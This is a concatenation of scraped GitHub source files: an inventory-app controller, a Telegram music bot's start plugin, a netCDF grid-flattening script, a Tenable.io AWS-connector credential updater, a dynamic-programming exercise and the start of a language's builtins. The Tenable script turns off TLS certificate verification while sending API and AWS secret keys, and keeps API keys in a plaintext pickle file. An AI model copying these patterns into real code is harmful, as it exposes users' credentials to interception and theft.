is not None:\n usuario_encontrado.nome = novo_nome\n self.__usuario_dao.persist(usuario_encontrado)\n self.__tela_altera_usuario.show_message(\"Alteração de usuário\",\n 'Usuário alterado com sucesso!')\n break\n else:\n self.__tela_altera_usuario.show_message(\"Alteração de usuário\", 'Operação cancelada!')\n break\n else:\n if botao != 'cancelar':\n 
self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n\n def exclui_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n self.__tela_remove_usuario.init_components(usuario_encontrado)\n while True:\n botao = self.__tela_remove_usuario.open()\n\n if botao == 'remover':\n self.__usuario_dao.remove(usuario_encontrado)\n self.__tela_remove_usuario.show_message('Remover usuário', 'Usuário removido com sucesso!')\n self.__tela_remove_usuario.close()\n break\n\n elif botao == 'cancelar':\n self.__tela_remove_usuario.show_message('Remover usuário', 'Operação cancelada!')\n self.__tela_remove_usuario.close()\n break\n\n elif botao in ('cancelar', sg.WIN_CLOSED):\n self.__tela_remove_usuario.show_message('Remover usuário', 'Operação cancelada!')\n self.__tela_remove_usuario.close()\n break\n\n else:\n if botao != 'cancelar':\n self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n def lista_um_usuario(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n self.__tela_seleciona_codigo.init_components()\n botao, codigo = self.__tela_seleciona_codigo.open()\n\n usuario_encontrado = None\n informacoes_tabela = []\n colunas = ['Código', 'Usuário']\n\n if botao == 'buscar':\n if codigo is not None and codigo in self.__usuario_dao.get_all_keys():\n for usuario in self.__usuario_dao.get_all():\n if usuario.codigo == codigo:\n usuario_encontrado = usuario\n self.__tela_usuario.show_message(\"Usuario encontrado!\",\n f\"O usuário de código {codigo} foi encontrado.\")\n break\n informacoes_tabela.append([usuario_encontrado.codigo, usuario_encontrado.nome])\n self.__tela_lista_entidades.init_components(informacoes_tabela, colunas, 'Lista de usuários')\n while True:\n botao = self.__tela_lista_entidades.open()\n if botao == 'ok' or botao == None:\n self.__tela_lista_entidades.close()\n break\n else:\n if botao != 'cancelar':\n self.__tela_usuario.show_message(\"Erro!\", \"Codigo Inexistente!\")\n\n\n def lista_usuarios(self):\n if len(self.__usuario_dao.get_all()) < 1:\n self.__tela_usuario.show_message('Erro!', 'Não existem usuários cadastrados!')\n else:\n informacoes_tabela = []\n colunas = ['Código', 'Usuário']\n\n for usuario in self.__usuario_dao.get_all():\n informacoes_tabela.append([usuario.codigo, usuario.nome])\n self.__tela_lista_entidades.init_components(informacoes_tabela, colunas, 'Lista de usuários')\n while True:\n botao = self.__tela_lista_entidades.open()\n\n if botao == 'ok':\n self.__tela_lista_entidades.close()\n break\n else:\n self.__tela_lista_entidades.close()\n break\n\n\n def retornar(self):\n self.__tela_usuario.close()\n\n def sair(self):\n exit(0)\n\n def abre_tela(self):\n opcoes = {1: self.inclui_usuario, 2: self.altera_usuario,\n 3: self.exclui_usuario, 4: self.lista_um_usuario,\n 5: self.lista_usuarios, 6: self.retornar, 0: self.sair}\n\n while True:\n self.__tela_usuario.init_components()\n opcao_escolhida = 
self.__tela_usuario.tela_opcoes()\n            self.__tela_usuario.close()\n\n            if opcao_escolhida in (6, None, sg.WIN_CLOSED):\n                self.__tela_usuario.close()\n                break\n            else:\n                opcoes[opcao_escolhida]()","repo_name":"petribrn/gerenciador-estoque","sub_path":"controle/controlador_usuario.py","file_name":"controlador_usuario.py","file_ext":"py","file_size_in_byte":8770,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} {"seq_id":"38446782966","text":"import asyncio\n\nfrom pyrogram import Client, filters\nfrom pyrogram.types import InlineKeyboardButton, InlineKeyboardMarkup, Message\nfrom youtubesearchpython.__future__ import VideosSearch\n\nimport config\nfrom config import BANNED_USERS\nfrom config.config import OWNER_ID\nfrom strings import get_command, get_string\nfrom AlexaMusic import Telegram, YouTube, app\nfrom AlexaMusic.misc import SUDOERS\nfrom AlexaMusic.plugins.play.playlist import del_plist_msg\nfrom AlexaMusic.plugins.sudo.sudoers import sudoers_list\nfrom AlexaMusic.utils.database import (\n    add_served_chat,\n    is_served_user,\n    add_served_user,\n    blacklisted_chats,\n    get_assistant,\n    get_lang,\n    get_userss,\n    is_on_off,\n    is_served_private_chat,\n)\nfrom AlexaMusic.utils.decorators.language import LanguageStart\nfrom AlexaMusic.utils.inline import help_pannel, private_panel, start_pannel\nfrom AlexaMusic.utils.command import commandpro\n\nloop = asyncio.get_running_loop()\n\n\n@app.on_message(\n    filters.command(get_command(\"START_COMMAND\"))\n    & filters.private\n    & ~filters.edited\n    & ~BANNED_USERS\n)\n@LanguageStart\nasync def start_comm(client, message: Message, _):\n    await add_served_user(message.from_user.id)\n    if len(message.text.split()) > 1:\n        name = message.text.split(None, 1)[1]\n        if name[0:4] == \"help\":\n            keyboard = help_pannel(_)\n            return await message.reply_text(_[\"help_1\"], reply_markup=keyboard)\n        if name[0:4] == \"song\":\n            return await message.reply_text(_[\"song_2\"])\n        if name[0:3] == \"sta\":\n            m = await message.reply_text(\n                f\"🥱 احضار بيناتك الخاصه من {config.MUSIC_BOT_NAME} سيرفر.\"\n            )\n            stats = await get_userss(message.from_user.id)\n            tot = len(stats)\n            if not stats:\n                await asyncio.sleep(1)\n                return await m.edit(_[\"ustats_1\"])\n\n            def get_stats():\n                msg = \"\"\n                limit = 0\n                results = {}\n                for i in stats:\n                    top_list = stats[i][\"spot\"]\n                    results[str(i)] = top_list\n                list_arranged = dict(\n                    sorted(\n                        results.items(),\n                        key=lambda item: item[1],\n                        reverse=True,\n                    )\n                )\n                if not results:\n                    return m.edit(_[\"ustats_1\"])\n                tota = 0\n                videoid = None\n                for vidid, count in list_arranged.items():\n                    tota += count\n                    if limit == 10:\n                        continue\n                    if limit == 0:\n                        videoid = vidid\n                    limit += 1\n                    details = stats.get(vidid)\n                    title = (details[\"title\"][:35]).title()\n                    if vidid == \"telegram\":\n                        msg += f\"🔗[ᴛᴇʟᴇɢʀᴀᴍ ᴍᴇᴅɪᴀ](https://t.me/Shayri_Music_Lovers) ** ᴩʟᴀʏᴇᴅ {count} ᴛɪᴍᴇs**\\n\\n\"\n                    else:\n                        msg += f\"🔗 [{title}](https://www.youtube.com/watch?v={vidid}) ** played {count} times**\\n\\n\"\n                msg = _[\"ustats_2\"].format(tot, tota, limit) + msg\n                return videoid, msg\n\n            try:\n                videoid, msg = await loop.run_in_executor(None, get_stats)\n            except Exception as e:\n                print(e)\n                return\n            thumbnail = await YouTube.thumbnail(videoid, True)\n            await m.delete()\n            await message.reply_photo(photo=thumbnail, caption=msg)\n            return\n        if name[0:3] == \"sud\":\n            await sudoers_list(client=client, message=message, _=_)\n            if await is_on_off(config.LOG):\n                sender_id = message.from_user.id\n                
sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} البوت بدا ليفحص sᴜᴅᴏʟɪsᴛ\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n return\n if name[0:3] == \"lyr\":\n query = (str(name)).replace(\"lyrics_\", \"\", 1)\n lyrical = config.lyrical\n lyrics = lyrical.get(query)\n if lyrics:\n return await Telegram.send_split_text(message, lyrics)\n else:\n return await message.reply_text(\"ғᴀɪʟᴇᴅ ᴛᴏ ɢᴇᴛ ʟʏʀɪᴄs.\")\n if name[0:3] == \"del\":\n await del_plist_msg(client=client, message=message, _=_)\n if name[0:3] == \"inf\":\n m = await message.reply_text(\"🔎\")\n query = (str(name)).replace(\"info_\", \"\", 1)\n query = f\"https://www.youtube.com/watch?v={query}\"\n results = VideosSearch(query, limit=1)\n for result in (await results.next())[\"result\"]:\n title = result[\"title\"]\n duration = result[\"duration\"]\n views = result[\"viewCount\"][\"short\"]\n thumbnail = result[\"thumbnails\"][0][\"url\"].split(\"?\")[0]\n channellink = result[\"channel\"][\"link\"]\n channel = result[\"channel\"][\"name\"]\n link = result[\"link\"]\n published = result[\"publishedTime\"]\n searched_text = f\"\"\"\n😲**معلومات المسارات**😲\n\n📌**عنوان:** {title}\n\n⏳**المدة:** {duration} ᴍɪɴᴜᴛᴇs\n👀**المشاهدات:** `{views}`\n⏰**نشرت في:** {published}\n🎥**القناة:** {channel}\n📎**رابط القناة:** [ᴠɪsɪᴛ ᴄʜᴀɴɴᴇʟ]({channellink})\n🔗**الرابط:** [ᴡᴀᴛᴄʜ ᴏɴ ʏᴏᴜᴛᴜʙᴇ]({link})\n\n💖 البحث يعمل بواسطة {config.MUSIC_BOT_NAME}\"\"\"\n key = InlineKeyboardMarkup(\n [\n [\n InlineKeyboardButton(text=\"• ʏᴏᴜᴛᴜʙᴇ •\", url=f\"{link}\"),\n InlineKeyboardButton(text=\"• ᴄʟᴏsᴇ •\", callback_data=\"close\"),\n ],\n ]\n )\n await m.delete()\n await app.send_photo(\n message.chat.id,\n photo=thumbnail,\n caption=searched_text,\n parse_mode=\"markdown\",\n reply_markup=key,\n )\n if await is_on_off(config.LOG):\n sender_id = message.from_user.id\n sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} البوت بدا ليفحص بينات المسارات\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n else:\n try:\n await app.resolve_peer(OWNER_ID[0])\n OWNER = OWNER_ID[0]\n except:\n OWNER = None\n out = private_panel(_, app.username, OWNER)\n if config.START_IMG_URL:\n try:\n await message.reply_photo(\n photo=config.START_IMG_URL,\n caption=_[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n except:\n await message.reply_text(\n _[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n else:\n await message.reply_text(\n _[\"start_2\"].format(config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n if await is_on_off(config.LOG):\n sender_id = message.from_user.id\n sender_name = message.from_user.first_name\n return await app.send_message(\n config.LOG_GROUP_ID,\n f\"{message.from_user.mention} بوتك بدأ.\\n\\n**ᴜsᴇʀ ɪᴅ:** {sender_id}\\n**ᴜsᴇʀɴᴀᴍᴇ:** {sender_name}\",\n )\n\n\n@app.on_message(\n filters.command(get_command(\"START_COMMAND\"))\n & filters.group\n & ~filters.edited\n & ~BANNED_USERS\n)\n@LanguageStart\nasync def testbot(client, message: Message, _):\n out = start_pannel(_)\n return await message.reply_text(\n _[\"start_1\"].format(message.chat.title, config.MUSIC_BOT_NAME),\n reply_markup=InlineKeyboardMarkup(out),\n )\n\n\nwelcome_group = 2\n\n\n@app.on_message(filters.new_chat_members, group=welcome_group)\nasync def welcome(client, message: Message):\n chat_id = 
message.chat.id\n if config.PRIVATE_BOT_MODE == str(True):\n if not await is_served_private_chat(message.chat.id):\n await message.reply_text(\n \"**خاص بوت الموسيقى**\\n\\nفقط للمحادثات المصرح بها من قبل مالكي الحساب، يرجى الطلب من مالك الحساب في الرسائل الخاصة للمصادقة على محادثتك، وإذا لم ترغب في ذلك، فافعل ما تريد لأني سأغادر..\"\n )\n return await app.leave_chat(message.chat.id)\n else:\n await add_served_chat(chat_id)\n for member in message.new_chat_members:\n try:\n language = await get_lang(message.chat.id)\n _ = get_string(language)\n if member.id == app.id:\n chat_type = message.chat.type\n if chat_type != \"supergroup\":\n await message.reply_text(_[\"start_6\"])\n return await app.leave_chat(message.chat.id)\n if chat_id in await blacklisted_chats():\n await message.reply_text(\n _[\"start_7\"].format(\n f\"https://t.me/{app.username}?start=sudolist\"\n )\n )\n return await app.leave_chat(chat_id)\n userbot = await get_assistant(message.chat.id)\n out = start_pannel(_)\n await message.reply_text(\n _[\"start_3\"].format(\n config.MUSIC_BOT_NAME,\n userbot.username,\n userbot.id,\n ),\n reply_markup=InlineKeyboardMarkup(out),\n )\n if member.id in config.OWNER_ID:\n return await message.reply_text(\n _[\"start_4\"].format(config.MUSIC_BOT_NAME, member.mention)\n )\n if member.id in SUDOERS:\n return await message.reply_text(\n _[\"start_5\"].format(config.MUSIC_BOT_NAME, member.mention)\n )\n return\n except:\n return\n\n\n@app.on_message(commandpro([\"/alive\", \"تنصيب\"]) & ~filters.edited)\nasync def start(client: Client, message: Message):\n await message.reply_photo(\n photo=f\"https://telegra.ph/file/5dd4c0ae6ddb63cd4cc81.jpg\",\n caption=f\"\"\"━━━━━━━━━━━━━━━━━━━━━━━━\\n\\n✪ اهلا بك سورس افاتار يعمل بالفعل \\n✪ لتنصيب بوتك على سورس افاتار @DEV_TOM 🌼 ..\\n\\n┏━━━━━━━━━━━━━━━━━┓\\n┣★ المطور: [ᯓ𓆩˹ ََ𝙏َِ𝙊َِ𝙈ِ ،ِّّ⸙⛥َٰ ( ٍّالبشمبرمج)⏤͟͟͞͞𓆃](https://t.me/DEV_TOM)\\n┣★ التحديثات › : [𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥](https://t.me/source_av)┓\\n┗━━━━━━━━━━━━━━━━━┛\\n\\n💞 اذا كان لديك اي اسألة \\nتحدث مع مطوري [𖠧 ๏͈͈͈͈͈͈͈ρꪮ𝘬ꫀꪑꪮꪀ𖤓̟̟̟̟̟̟̥̥̥̥̟͜͡️مـغــٰـُ͢ـُـ̷ِْــٰــرور](https://t.me/devpokemon) سورس افاتار يتمنى لك وقتا سعيدا ...\\n\\n━━━━━━━━━━━━━━━━━━━━━━━━\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"🌼 𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥 💮\", url=f\"https://t.me/source_av\")]]\n ),\n )\n\n\n@app.on_message(commandpro([\"/verify\", \"توثيق\"]) & ~filters.edited)\nasync def start(client: Client, message: Message):\n if await is_served_user(message.from_user.id):\n await message.reply_text(\n text=\"😂 عزيزي انت موثق بالفعل\",\n )\n return\n await add_served_user(message.from_user.id)\n await message.reply_photo(\n photo=f\"https://telegra.ph/file/5dd4c0ae6ddb63cd4cc81.jpg\",\n caption=f\"\"\"━━━━━━━━━━━━━━━━━━━━━━━━\\n\\n✪ **تهانينا** 🎉\\n✪ الان انت موثق في بينات افاتار ارجع الان وشغل الموسيقى واستمتع بوقتك 🌼 ..\\n\\n━━━━━━━━━━━━━━━━━━━━━━━━\"\"\",\n reply_markup=InlineKeyboardMarkup(\n [[InlineKeyboardButton(\"🌼 𝗦𝗢𝗨𝗥𝗖𝗘 𝗔𝗩𝗔𝗧𝗔𝗥 💮\", url=f\"https://t.me/source_av\")]]\n ),\n )\n","repo_name":"Masahme/New_source","sub_path":"AlexaMusic/plugins/bot/start.py","file_name":"start.py","file_ext":"py","file_size_in_byte":13384,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"20926646099","text":"#!/usr/bin/env python\n\n#-------------\n# Load modules\n#-------------\nfrom netCDF4 import Dataset\nimport numpy\nimport argparse\n\ndef parse_args():\n p = argparse.ArgumentParser(description='Flatten a lat-lon to 1D')\n 
p.add_argument('input',type=str,help='input file',default=None)\n p.add_argument('output',type=str,help='output file',default=None)\n return vars(p.parse_args())\n\n#------------------\n# Opening the file\n#------------------\ncomm_args = parse_args()\nInput_file = comm_args['input']\nOutput_file = comm_args['output']\nncFid = Dataset(Input_file, mode='r')\nncFidOut = Dataset(Output_file, mode='w', format='NETCDF4')\n\n#---------------------\n# Extracting variables\n#---------------------\n\nhaveLev = False\nfor dim in ncFid.dimensions:\n if dim == 'lev':\n haveLev = True\n levSize = len(ncFid.dimensions['lev'])\n\n\nhaveTime = False\nfor dim in ncFid.dimensions:\n if dim == 'time':\n haveTime = True\n timeSize = len(ncFid.dimensions['time'])\n\nif haveTime:\n time = ncFid.variables['time'][:]\nif haveLev:\n lev = ncFid.variables['lev'][:]\n levSize = len(ncFid.dimensions['lev'])\n\ncRes = len(ncFid.dimensions['Xdim'])\n\nXdim = ncFidOut.createDimension('lon',cRes)\nYdim = ncFidOut.createDimension('lat',cRes*6)\n\nif haveLev:\n levOut = ncFidOut.createDimension('lev',levSize)\n\nif haveTime:\n timeOut = ncFidOut.createDimension('time',timeSize)\n\nvXdim = ncFidOut.createVariable('lon','f8',('lon'))\nvYdim = ncFidOut.createVariable('lat','f8',('lat'))\nsetattr(ncFidOut.variables['lon'],'units','degrees_east')\nsetattr(ncFidOut.variables['lat'],'units','degrees_north')\nsetattr(ncFidOut.variables['lon'],'long_name','longitude')\nsetattr(ncFidOut.variables['lat'],'long_name','latitude')\nvXdim[:]=range(1,cRes+1)\nvYdim[:]=range(1,(cRes*6)+1)\n\nif haveLev:\n vLevOut= ncFidOut.createVariable('lev','f8',('lev'))\n for att in ncFid.variables['lev'].ncattrs():\n setattr(ncFidOut.variables['lev'],att,getattr(ncFid.variables['lev'],att))\n vLevOut[:] = range(1,levSize+1)\n\nif haveTime:\n vtimeOut = ncFidOut.createVariable('time','i4',('time'))\n for att in ncFid.variables['time'].ncattrs():\n setattr(ncFidOut.variables['time'],att,getattr(ncFid.variables['time'],att))\n vtimeOut[:] = range(timeSize)\n\nExclude_Var = ['Xdim','Ydim','time','lev','lons','lats','contacts','anchor','cubed_sphere','nf','ncontact','corner_lons','corner_lats']\n\nfor var in ncFid.variables:\n if var not in Exclude_Var:\n temp = ncFid.variables[var][:]\n dim_size =len(temp.shape)\n if haveTime:\n dim_size = dim_size -1\n \n if dim_size == 4:\n if haveTime:\n tout = ncFidOut.createVariable(var,'f4',('time','lev','lat','lon'),fill_value=1.0e15)\n else:\n tout = ncFidOut.createVariable(var,'f4',('lev','lat','lon'),fill_value=1.0e15)\n for att in ncFid.variables[var].ncattrs():\n if att != \"_FillValue\":\n setattr(ncFidOut.variables[var],att,getattr(ncFid.variables[var],att))\n for i in range(6):\n il = cRes*i\n iu = cRes*(i+1)\n for j in range(levSize):\n if haveTime:\n tout[:,j,il:iu,:]=temp[:,j,i,:,:]\n else:\n tout[j,il:iu,:]=temp[j,i,:,:]\n\n elif dim_size == 3: \n if haveTime:\n tout = ncFidOut.createVariable(var,'f4',('time','lat','lon'),fill_value=1.0e15)\n else:\n tout = ncFidOut.createVariable(var,'f4',('lat','lon'),fill_value=1.0e15)\n for att in ncFid.variables[var].ncattrs():\n if att != \"_FillValue\":\n setattr(ncFidOut.variables[var],att,getattr(ncFid.variables[var],att))\n setattr(ncFidOut.variables[var],'grid_mapping','cubed_sphere')\n setattr(ncFidOut.variables[var],'coordinates','lons lats')\n for i in range(6):\n il = cRes*i\n iu = cRes*(i+1)\n for j in range(cRes):\n for k in range(cRes):\n if haveTime:\n tout[:,il+k,j]=temp[:,i,k,j].copy()\n else:\n tout[il+k,j]=temp[i,k,j]\n\n#-----------------\n# 
Closing the file\n#-----------------\nncFidOut.close()\nncFid.close()\n\n","repo_name":"bena-nasa/GEOS_Restart_Utilities","sub_path":"convertNewCStoOldCS.py","file_name":"convertNewCStoOldCS.py","file_ext":"py","file_size_in_byte":4250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33950515063","text":"#!/usr/bin/env python\n#\n# This script enables you to go through and programmatically replace AWS Connector\n# credentials stored in Tenable.io.\n#\n# Script limitations:\n# - Does not handle multiple trails per connector.\n# - Doesn't have much error handling, only minimal logging.\n# - No immediate way to know if new creds are successful or not.\n#\n# Requirements: Python 3.7+, requests, pickle\n#\n# Author: ThisTooShallXSS (https://github.com/thistooshallxss)\n#\n# Usage: \n# - python tio_api_change_aws_conn.py (For interactive prompts)\n# - python tio_api_change_aws_conn.py 'AWS Connector 123' ACCESSCODE123 SECRETCODE123 \n#\n\nimport json, requests\nimport sys\nimport pickle\n\nrequests.packages.urllib3.disable_warnings()\n\nclass connector(object): # Object for storing existing connector details.\n def __init__(self, name, status, conn_id, conn_arn, trail_name):\n self.name = name\n self.status = status\n self.conn_id = conn_id\n self.conn_arn = conn_arn\n self.trail_name = trail_name\n\nclass new_creds(object): # Object for temp storing new AWS creds.\n def __init__(self, name, access, secret):\n self.name = name\n self.access = access\n self.secret = secret\n\ndef save_keys():\n #assumption is that the user keys didn't work or don't exsist\n print(\"Please provide your Tenable.io User API keys.\")\n access_key = input(\"Please provide your Tenable.io Access Key (use quotes): \")\n secret_key = input(\"Please provide your Tenable.io Secret Key (use quotes): \")\n\n dicts = {\"Access Key\": access_key, \"Secret Key\": secret_key}\n\n pickle_out = open(\"keys.pickle\", \"wb\")\n pickle.dump(dicts, pickle_out)\n pickle_out.close()\n\n print(\"Now you have keys, re-run your command\")\n sys.exit()\n\ndef grab_headers():\n import os\n\n access_key = ''\n secret_key = ''\n\n #check for API keys; if none, get them from the user by calling save_keys()\n if os.path.isfile('./keys.pickle') is False:\n save_keys()\n else:\n pickle_in = open(\"keys.pickle\", \"rb\")\n keys = pickle.load(pickle_in)\n access_key = keys[\"Access Key\"]\n secret_key = keys[\"Secret Key\"]\n\n #set the header\n headers = {'Content-type':'application/json',\n 'X-ApiKeys':'accessKey='+access_key+';secretKey='+secret_key}\n return headers\n\ndef get_data(url_mod):\n url = \"https://cloud.tenable.com\"\n headers = grab_headers()\n r = requests.request('GET', url + url_mod, headers=headers, verify=False)\n\n if r.status_code != 200:\n print('Status:', r.status_code, 'Problem with the initial GET request. 
Exiting.')\n        sys.exit()\n\n    data = r.json()\n    return data\n\ndef get_connectors():\n    data = get_data('/settings/connectors')\n    connectors = []\n\n    for x in range(len(data[\"connectors\"])):\n        # Go through each configured connector and store its settings.\n        connectors.append(connector(\n            data[\"connectors\"][x][\"name\"],\n            data[\"connectors\"][x][\"status\"],\n            data[\"connectors\"][x][\"id\"],\n            data[\"connectors\"][x][\"params\"][\"trails\"][0][\"arn\"],\n            data[\"connectors\"][x][\"params\"][\"trails\"][0][\"name\"]))\n\n    return connectors\n\ndef put_connector_changes(connector_uuid, json_payload):\n    # This makes the PUT request to replace credentials on T.io\n    url = \"https://cloud.tenable.com/settings/connectors/\"\n    headers = grab_headers()\n    r = requests.request('PUT', url + connector_uuid, headers=headers, data=json_payload, verify=False)\n\n    if r.status_code != 200:\n        print('Status:', r.status_code, 'Problem with the final PUT request. Exiting.')\n        sys.exit()\n\n    return True\n\ndef report_connector_options(connectors):\n    # For all available connectors, this shows the name/status/ID for each.\n    print('\\nConnectors Available:')\n    for x in range(len(connectors)):\n        print(\"{} - {} (Status: {}) (ID: {})\".format(x, connectors[x].name, connectors[x].status, connectors[x].conn_id))\n\ndef get_connector_id_by_name(connectors, name):\n    # This returns the UID of the connector when given a valid connector name.\n    # Was previously used by our script, but has since been replaced with a simpler validity check.\n    for x in range(len(connectors)):\n        if connectors[x].name == name:\n            ret = connectors[x].conn_id\n    return ret\n\ndef check_valid_connector_by_name(connectors, name):\n    # This returns True/False based on the existence of the AWS connector name.\n    ret = False\n\n    for x in range(len(connectors)):\n        if connectors[x].name == name:\n            ret = True\n    return ret\n\ndef get_connector_obj_ref(connectors):\n    # This isn't used in my script, but might be useful further down the road.\n    print('\\nPlease type the name of the connector you would like to change credentials for:')\n    choice = input(' >>> ')\n    ret = \"\"\n\n    for x in range(len(connectors)):\n        if connectors[x].name == choice:\n            ret = x\n    return ret\n\ndef prompt_for_creds(name):\n    # In case we're not provided the creds at runtime, we prompt for them here.\n    print(\"Changing authentication tokens for '{}'.\".format(name))\n    access_key = input(' Please provide your ACCESS key: ')\n    secret_key = input(' Please provide your SECRET key: ')\n    ret = [access_key, secret_key]\n    return ret\n\ndef store_creds(name):\n    if len(sys.argv) == 4: # If argv3 & 4 are given, we use those\n        access_key = sys.argv[2]\n        secret_key = sys.argv[3]\n    else: # otherwise we prompt for which creds to use instead.\n        creds_list = prompt_for_creds(name)\n        access_key = creds_list[0]\n        secret_key = creds_list[1]\n\n    # Returns an object \"new_creds\"\n    return new_creds(name, access_key, secret_key)\n\ndef trigger_connector_import(uuid):\n    # This makes the POST request to update the AWS connector status\n    url = \"https://cloud.tenable.com/settings/connectors/\"\n    action = \"/import\"\n    headers = grab_headers()\n    r = requests.request('POST', url + uuid + action, headers=headers, verify=False)\n    # POST https://cloud.tenable.com/settings/connectors/6100a0f7-0101-4f13-8e60-90be93ca16c3/import\n\n    if r.status_code != 200:\n        print('Status:', r.status_code, 'Problem with the import POST request. 
Exiting.')\n        sys.exit()\n\n    return True \n\ndef change_stored_creds(connectors, creds):\n    outcome = False # Default return value if no connector name matches.\n    for x in range(len(connectors)):\n        if connectors[x].name == creds.name:\n\n            # At this point, we've identified the connector we're editing, and parsing all new details.\n            connector_uuid = connectors[x].conn_id\n            trail_arn = connectors[x].conn_arn\n            trail_name = connectors[x].trail_name\n\n            # Grab user-supplied details\n            access_key = creds.access\n            secret_key = creds.secret\n            connector_name = creds.name\n\n            # Build out the JSON payload which is submitted to make the changes.\n            json_payload1 = '{{\"connector\":{{\"type\":\"aws\",\"data_type\":\"assets\",\"name\":\"{}\",'.format(connector_name)\n            json_payload2 = '\"params\":{{\"trails\":[{{\"arn\":\"{}\",\"name\":\"{}\",\"region\":{{\"name\":\"All\",\"friendly_name\":\"All\"}},\"availability\":\"success\"}}],'.format(trail_arn, trail_name)\n            json_payload3 = '\"access_key\":\"{}\",\"secret_key\":\"{}\"}}}}}}'.format(access_key, secret_key)\n\n            # Separated the payload into 3 vars for easier readability.\n            json_payload = json_payload1 + json_payload2 + json_payload3\n            #print('Payload to be submitted:\\n\\n%s\\n' % json_payload)\n\n            if put_connector_changes(connector_uuid, json_payload):\n                print('The AWS credentials in Tenable.io have been replaced for \"{}\".'.format(creds.name))\n                trigger_connector_import(connector_uuid)\n                outcome = True\n            else:\n                print('An error occurred when changing the AWS credentials for \"{}\".'.format(creds.name))\n                outcome = False\n            break\n\n    return outcome\n\ndef get_name_choice(connectors):\n    # If someone has provided argv1, we query for that connector name's validity.\n    if len(sys.argv) > 1:\n        choice = sys.argv[1]\n    else: # Otherwise, we give them the available connectors and have them choose.\n        report_connector_options(connectors)\n        print('\\nPlease indicate the name of the connector you would like to change credentials for:')\n        choice = input(' >>> ')\n        \n    return choice\n\ndef main():\n    try:\n        connectors = get_connectors()\n    except:\n        print('Could not get connectors from Tenable.io... 
Quitting')\n sys.exit()\n\n connector_name = get_name_choice(connectors)\n new_creds = []\n \n if check_valid_connector_by_name(connectors, connector_name):\n new_creds = store_creds(connector_name)\n\n change_stored_creds(connectors, new_creds)\n\nif __name__ == '__main__':\n main()\n","repo_name":"ThisTooShallXSS/tio_automation","sub_path":"Pre-2020/tio_api_change_aws_conn.py","file_name":"tio_api_change_aws_conn.py","file_ext":"py","file_size_in_byte":8921,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"42240040587","text":"import sys\ninput = sys.stdin.readline\nN = int(input())\narr = list(map(int, input().split()))\ndp = [1] * N\nanswer = []\n\nfor i in range(1, N):\n for j in range(0,i):\n if arr[i] > arr[j]:\n dp[i] = max(dp[j] + 1, dp[i])\n\nprint(max(dp))\nflag = max(dp)\nfor i in range(N-1, -1, -1):\n if flag == dp[i]:\n answer.append(arr[i])\n flag -= 1\n\nanswer.reverse()\nfor i in range(len(answer)):\n print(answer[i], end=\" \")\n","repo_name":"wrjang96/BJ-algorithm","sub_path":"BJ - 14002(가장 긴 증가하는 부분 수열 4).py","file_name":"BJ - 14002(가장 긴 증가하는 부분 수열 4).py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"18640665271","text":"# coding: utf-8\nfrom paradoc.objects import *\nfrom typing import Callable, List, Optional, Tuple\nimport itertools\nimport paradoc.num as num\nimport paradoc.base as base\nimport sys, math\nimport time, datetime\nimport random\nimport operator, functools\nimport re\nfrom paradoc.builtins.case import Case, CasedBuiltIn\nfrom paradoc.builtins.lazy_vars import arithmetic_literal_trigger\nfrom paradoc.string import str_class, case_double\nimport paradoc.discrete as discrete\n\ndef second_or_error(x: Tuple[object, Optional[PdObject]], error_msg: str) -> PdObject:\n t, t2 = x\n if t2 is None:\n raise AssertionError(error_msg)\n return t2\n\ndef initialize_builtins(env: Environment, sandboxed: bool, debug: bool) -> None:\n\n def put(*ss: str,\n docs: Optional[str] = None,\n stability: str = \"unstable\") -> Callable[[Callable[[Environment], None]], None]:\n name = ss[0]\n aliases = list(ss)\n def inner_put(f: Callable[[Environment], None]) -> None:\n for s in ss:\n env.put(s, BuiltIn(name, f, aliases=aliases,\n docs=docs, stability=stability), fail_if_overwrite=True)\n return inner_put\n\n def cput(name: str,\n extra_names: List[str],\n cases: List[Case],\n docs: Optional[str] = None,\n stability: str = \"unstable\",\n golf_aliases: Optional[List[str]] = None) -> CasedBuiltIn:\n builtin = CasedBuiltIn(name, cases, aliases = [name] + extra_names,\n docs=docs, stability=stability, golf_aliases=golf_aliases)\n env.put(name, builtin, fail_if_overwrite=True)\n for xname in extra_names: env.put(xname, builtin, 